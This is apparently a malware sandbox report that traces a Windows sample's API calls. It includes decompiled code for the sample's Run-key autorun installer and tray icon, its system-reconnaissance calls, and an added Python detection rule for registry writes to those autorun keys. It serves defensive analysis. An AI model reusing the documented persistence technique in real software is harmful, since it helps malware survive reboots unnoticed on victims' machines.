                                    • Part of subcall function 0040B7B9: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28), ref: 0040B7E3
                                    • Part of subcall function 0040B7B9: RegSetValueExW.ADVAPI32(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                    • Part of subcall function 0040B7B9: RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28), ref: 0040B801
                                    • Part of subcall function 0040B7B9: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 0040B810
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 00407DBE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 00407DC8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 00407DE8
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 00407E02
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 00407E0C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 00407E2C
                                  Strings
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 00407D5F
                                  • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407D8F, 00407DD3
                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00407E17
                                  • $ZA, xrefs: 00407DD0, 00407D8C
                                   Memory Dump Source
                                   • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: G@std@@U?$char_traits@V?$allocator@$G@2@@0@G@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@V10@@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                  • String ID: $ZA$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
                                  • API String ID: 111787555-3388917883
                                  • Opcode ID: e235326932527ed2226d8983e4f804bb91d78ac99fb475050114bcfa4d032180
                                  • Instruction ID: d86c43b3a5ba32eb059a2cdc2ec90b1b4ffa6c8f934f2ed61d0225c93748e370
                                  • Opcode Fuzzy Hash: e235326932527ed2226d8983e4f804bb91d78ac99fb475050114bcfa4d032180
                                  • Instruction Fuzzy Hash: EE215A72D00114BBD710BAA69C4AEFB7F2CDF91354F440429F91962182E6BA8994C7E6
                                  Uniqueness

                                  Uniqueness Score: -1.00%
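The function above is the sample's autorun installer: depending on its three flag arguments it sets a value under HKCU\...\CurrentVersion\Run, HKLM\...\CurrentVersion\Run or HKLM\...\Policies\Explorer\Run, and the only executable path it references is RegAsm.exe. The check below is an added example for this report, not code from the sample or from the sandbox. It turns that knowledge into a detection rule over registry telemetry: it parses Sysmon-style Event ID 13 (value set) lines and flags writes that land in exactly those three keys, rating a value whose data points at RegAsm.exe higher than an arbitrary autorun entry. The event lines are constructed to mimic Sysmon fields, not captured logs; the value name "updater", the writer's path and the SID are placeholders.

```python
"""Flag registry value-set events that land in the autorun keys E00407D53 writes.

Added example for this report, not code from the sample or from the sandbox.
The event lines are constructed to mimic Sysmon Event ID 13 (RegistryEvent,
value set) fields; they are not captured telemetry. The value name "updater",
the writer's path and the SID are placeholders.
"""
import re

# Subkeys the installer writes, with a trailing separator so that RunOnce,
# RunServices etc. do not match. Hive 0x80000001 (HKCU) appears in Sysmon as
# HKU\<SID>, hive 0x80000002 (HKLM) as HKLM; the comparison ignores case.
AUTORUN_SUBKEYS = (
    "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",
    "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\",
)

# The installer references this path directly (see the Strings list above);
# a Run value whose data points at it is rated higher than a generic entry.
HIGH_RISK_DATA = ("regasm.exe",)

_FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Parse one 'Key=value Key="quoted value"' event line into a dict."""
    return {k: v.strip('"') for k, v in _FIELD_RE.findall(line)}


def classify(event):
    """Return a finding for a value set under an autorun key, else None."""
    if event.get("EventID") != "13" or event.get("EventType") != "SetValue":
        return None
    target = event.get("TargetObject", "")
    low = target.lower()
    for sub in AUTORUN_SUBKEYS:
        if sub.lower() not in low:
            continue
        data = event.get("Details", "")
        return {
            "hive": target.split("\\", 1)[0],          # as rendered by the sensor
            "key": sub.strip("\\"),
            "value_name": target.rsplit("\\", 1)[-1],
            "data": data,
            "image": event.get("Image", ""),
            "severity": "high" if any(h in data.lower() for h in HIGH_RISK_DATA) else "medium",
        }
    return None


def scan(lines):
    """Run classify() over event lines and return the non-empty findings."""
    return [f for f in (classify(parse_event(line)) for line in lines) if f]


SAMPLE_EVENTS = [  # constructed, not captured
    r'EventID=13 EventType=SetValue Image="C:\Users\victim\Desktop\Covid-19 relief.exe" '
    r'TargetObject="HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\updater" '
    r'Details="C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"',
    r'EventID=13 EventType=SetValue Image="C:\Users\victim\Desktop\Covid-19 relief.exe" '
    r'TargetObject="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\updater" '
    r'Details="C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"',
    r'EventID=13 EventType=SetValue Image="C:\Windows\explorer.exe" '
    r'TargetObject="HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden" '
    r'Details="DWORD (0x00000001)"',
    r'EventID=13 EventType=SetValue Image="C:\Windows\System32\msiexec.exe" '
    r'TargetObject="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Setup" '
    r'Details="C:\Windows\Temp\setup.exe /finish"',
    r'EventID=12 EventType=CreateKey Image="C:\Users\victim\Desktop\Covid-19 relief.exe" '
    r'TargetObject="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"], finding["hive"], finding["key"],
              finding["value_name"], "->", finding["data"])
```

The trailing separator in AUTORUN_SUBKEYS is what keeps RunOnce and RunServices out of the match; widen the tuple if your baseline also covers those. The hive is reported as the sensor renders it rather than mapped back to the HKEY constant, because a per-user write shows up under HKU\<SID> and the SID is itself useful for attribution. Key creation alone (Event ID 12) is ignored on purpose: the sample creates the key and sets the value in the same subcall, and the value set is the event that carries the data.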

                                   C-Code - Quality: 64%
                                   			E00413C3F(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                   				struct tagPOINT _v12;
                                   				void* _t16;
                                   				struct HMENU__* _t17;
                                   				void* _t20;
                                   				void* _t24;

                                   				// Window procedure for the notification-area (tray) icon: _a4 = hWnd, _a8 = uMsg,
                                   				// _a12 = wParam, _a16 = lParam. The globals at 0x41c1f0, 0x41c1fc and 0x41c200 hold
                                   				// the popup HMENU, the window to show/hide and the NOTIFYICONDATA passed to Shell_NotifyIconA.
                                   				// The trailing hex values are the instruction addresses the report shows beside each line.
                                   				_t16 = _a8 - 1;  // 0x00413c47
                                   				if(_t16 == 0) {  // 0x00413c48  uMsg == 1 (WM_CREATE)
                                   					_t17 = CreatePopupMenu();  // 0x00413d1c
                                   					 *0x41c1f0 = _t17;  // 0x00413d2c
                                   					AppendMenuA(_t17, 0, 0, "Close");  // 0x00413d31  single item, uIDNewItem 0
                                   					L15:  // 0x00413d37
                                   					return 0;  // 0x00000000
                                   				}  // 0x00413d37
                                   				_t20 = _t16 - 0x110;  // 0x00413c4e
                                   				if(_t20 == 0) {  // 0x00413c53  uMsg == 0x111 (WM_COMMAND)
                                   					if(_a12 != 0) {  // 0x00413d03  wParam 0 is the "Close" item
                                   						goto L15;  // 0x00000000
                                   					}  // 0x00000000
                                   					Shell_NotifyIconA(2, 0x41c200);  // 0x00413d0c  NIM_DELETE: remove the tray icon
                                   					ExitProcess(0);  // 0x00413d14
                                   				}  // 0x00413d14
                                   				if(_t20 == 0x2f0) {  // 0x00413c5e  uMsg == 0x401 (WM_USER+1, the icon's callback message)
                                   					_t24 = _a16 - 0x201;  // 0x00413c7a
                                   					if(_t24 == 0) {  // 0x00413c7f  lParam == 0x201 (WM_LBUTTONDOWN): toggle the window
                                   						if(IsWindowVisible( *0x41c1fc) == 0) {  // 0x00413cd1
                                   							ShowWindow( *0x41c1fc, 9);  // 0x00413ceb  SW_RESTORE
                                   							SetForegroundWindow( *0x41c1fc);  // 0x00413cf7
                                   						} else {  // 0x00413cd3
                                   							ShowWindow( *0x41c1fc, 0);  // 0x00413cdb  SW_HIDE
                                   						}  // 0x00413cdb
                                   						goto L15;  // 0x00000000
                                   					}  // 0x00413cd1
                                   					if(_t24 == 3) {  // 0x00413c84  lParam == 0x204 (WM_RBUTTONDOWN): context menu at the cursor
                                   						GetCursorPos( &_v12);  // 0x00413c97
                                   						SetForegroundWindow(_a4);  // 0x00413ca0
                                   						TrackPopupMenu( *0x41c1f0, 0, _v12, _v12.y, 0, _a4, 0);  // 0x00413cbb
                                   						goto L15;  // 0x00000000
                                   					}  // 0x00413cbb
                                   					_push(_a16);  // 0x00413c86
                                   					_push(_a12);  // 0x00413c89
                                   					_push(0x401);  // 0x00413c8c
                                   					L4:  // 0x00413c69
                                   					return DefWindowProcA(_a4, ??, ??, ??);  // 0x00000000  ?? are the three pushed arguments (uMsg, wParam, lParam)
                                   				}  // 0x00413c6c
                                   				_push(_a16);  // 0x00413c60
                                   				_push(_a12);  // 0x00413c63
                                   				_push(_a8);  // 0x00413c66
                                   				goto L4;  // 0x00000000
                                   			}

                                  APIs
                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 00413C6C
                                  • GetCursorPos.USER32(?), ref: 00413C97
                                  • SetForegroundWindow.USER32(?), ref: 00413CA0
                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00413CBB
                                  • Shell_NotifyIconA.SHELL32(00000002,0041C200), ref: 00413D0C
                                  • ExitProcess.KERNEL32 ref: 00413D14
                                  • CreatePopupMenu.USER32 ref: 00413D1C
                                  • AppendMenuA.USER32 ref: 00413D31
                                   Memory Dump Source
                                   • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                  • String ID: Close
                                  • API String ID: 1657328048-3535843008
                                  • Opcode ID: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                  • Instruction ID: 3a9117e372e52b2e565462b42d507c4b1172ca251bbe850fbb6b863f13e0a9c7
                                  • Opcode Fuzzy Hash: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                  • Instruction Fuzzy Hash: 3A210972180609FBDB115FA4ED0DBEA3F35FB08702F208021F606A51B1D7799AA0EB5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040E91D
                                    • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E845
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                    • Part of subcall function 0041228F: GlobalMemoryStatusEx.KERNEL32(?), ref: 004122A0
                                    • Part of subcall function 0041230A: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0041B320), ref: 0041231D
                                    • Part of subcall function 0041230A: GetProcAddress.KERNEL32(00000000), ref: 00412324
                                    • Part of subcall function 0041230A: Sleep.KERNEL32(000003E8,?,0041B320), ref: 0041233F
                                    • Part of subcall function 0041230A: __aulldiv.LIBCMT ref: 004123E4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?,00000095), ref: 0040E87F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000008,?,00000000), ref: 0040E898
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000008,z@,00000000), ref: 0040E8AC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040E8B7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040E8C1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000096), ref: 0040E8DE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8F0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8F9
                                   Memory Dump Source
                                   • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$D@1@@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$AddressGlobalHandleMemoryModuleProcSleepStatus__aulldivconnect
                                  • String ID: z@
                                  • API String ID: 1937136672-317290069
                                  • Opcode ID: a246132ec2ecd2f0ae49596ae3424449e4833eaa9590391719729fa14ec755ea
                                  • Instruction ID: 66f006b43ec3188ac29da0c8503291dee518f3a81564da720cf043436550991c
                                  • Opcode Fuzzy Hash: a246132ec2ecd2f0ae49596ae3424449e4833eaa9590391719729fa14ec755ea
                                  • Instruction Fuzzy Hash: E1318472C0010CEBDB01EBA1DD49EDEB778AB54305F00416AFA12A70D1EFB55B48CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU,?,?,00000004), ref: 0040BDC6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE2B
                                   Memory Dump Source
                                   • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??8std@@D@2@@0@D@2@@std@@V?$basic_string@
                                  • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                                  • API String ID: 2054586871-62392802
                                  • Opcode ID: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                  • Instruction ID: 2660231c1808b36434503ece8d2e95605cb547f4994df65369f224bebc220479
                                  • Opcode Fuzzy Hash: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                  • Instruction Fuzzy Hash: 8D01C43A58122AA2CE049AD0EC01ADA7708CF057B2F71007BAE04B76C0CB38D9854BCD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0040B5A2: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                    • Part of subcall function 0040B5A2: RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                    • Part of subcall function 0040B5A2: RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                    • Part of subcall function 0040B5A2: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412210
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412223
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 0041222D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412236
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00409BE6,?), ref: 0041224F
                                    • Part of subcall function 0041290A: ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6B03CB60,?,?,0041225E,?), ref: 00412919
                                    • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                    • Part of subcall function 0041290A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                    • Part of subcall function 0041290A: ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                    • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                    • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                    • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00412265
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041226E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0041227B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412284
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@G@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                                  • String ID: .exe$http\shell\open\command
                                  • API String ID: 2647146128-4091164470
                                  • Opcode ID: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                  • Instruction ID: d6ae35875aa51399811599ff5055279212e103e4be7b08956a6055bd29980306
                                  • Opcode Fuzzy Hash: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                  • Instruction Fuzzy Hash: F011127291061DEBCF04EBE0EC49FFD7738FB48304F544425F512A21A0DA74A148CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410020
                                  • EnumDisplayMonitors.USER32(00000000,00000000,0041010A,00000000), ref: 0041003D
                                  • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 0041004D
                                  • EnumDisplayDevicesW.USER32(?,00000000,?,00000000), ref: 00410078
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041623C), ref: 00410095
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004100A0
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004100AC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100B5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100BE
                                  • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 004100DF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004100F5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100FE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$DisplayEnum$??0?$basic_string@??1?$basic_string@Devices$G@1@@V01@@$G@2@@0@Hstd@@MonitorsV01@V10@V?$basic_string@Y?$basic_string@
                                  • String ID:
                                  • API String ID: 2807017801-0
                                  • Opcode ID: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                  • Instruction ID: 1aed4e64735882a0db0bb71c951f021fa06bcdcdb304fa8f35c3d61367e112a6
                                  • Opcode Fuzzy Hash: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                  • Instruction Fuzzy Hash: DE21DA7290111EEBDB509BA1DC88EEFBF7CEF19345F004166F50AE2050EB749689CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _EH_prolog.MSVCRT ref: 00401EA7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@$D@1@@$?size@?$basic_string@H_prologV01@@_itoa
                                  • String ID:
                                  • API String ID: 3851886811-0
                                  • Opcode ID: 8b148193296b1a1f6a81c6ab41585fcb54b43abeb16e20dcdf97d49bc51763a5
                                  • Instruction ID: 3c13f4a99a68d7d03b3b7bfc4098c6c0fbf2233efe5d64f965fa74e17679f3d5
                                  • Opcode Fuzzy Hash: 8b148193296b1a1f6a81c6ab41585fcb54b43abeb16e20dcdf97d49bc51763a5
                                  • Instruction Fuzzy Hash: 3C212FB280010DEBCB05EBD1ED499EEBB78FB54315F14412AF412A7061EB755A48CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 0041343B
